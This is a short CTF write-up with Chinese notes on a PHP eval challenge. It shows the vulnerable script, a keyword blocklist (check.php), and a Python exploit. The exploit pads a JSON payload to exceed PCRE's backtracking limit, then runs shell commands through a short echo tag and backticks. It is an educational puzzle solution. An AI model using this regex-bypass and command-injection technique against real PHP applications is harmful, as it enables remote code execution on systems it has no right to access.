<?php
include "check.php";
if (isset($_REQUEST['letter'])){
$txw4ever = $_REQUEST['letter'];
if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw4ever)){
die("再加把油喔");
}
else{
$command = json_decode($txw4ever,true)['cmd'];
checkdata($command);
@eval($command);
}
}
else{
highlight_file(__FILE__);
}
?>
先用PCRE绕过正则,然后checkdata里似乎过滤了不少,``还是可以,但echo没法用,用php的短标签来代替
import requests
payload='{"cmd":"?><?= `ls`","test":"' + "@"*(1000000) + '"}'#好像一定要用特殊字符
res = requests.post("http://node4.anna.nssctf.cn:28794/", data={"letter":payload})
print(res.text)
然后cat和tac都用不了,用strings,more等命令代替。
check.php:
<?php
function checkdata($data){
if (preg_match("/\^|\||\~|assert|print|include|require|\(|echo|flag|data|php|glob|sys|phpinfo|POST|GET|REQUEST|exec|pcntl|popen|proc|socket|link|passthru|file|posix|ftp|\_|disk|tcp|cat|tac/i",$data,$match)){
die('差一点点捏');
}
}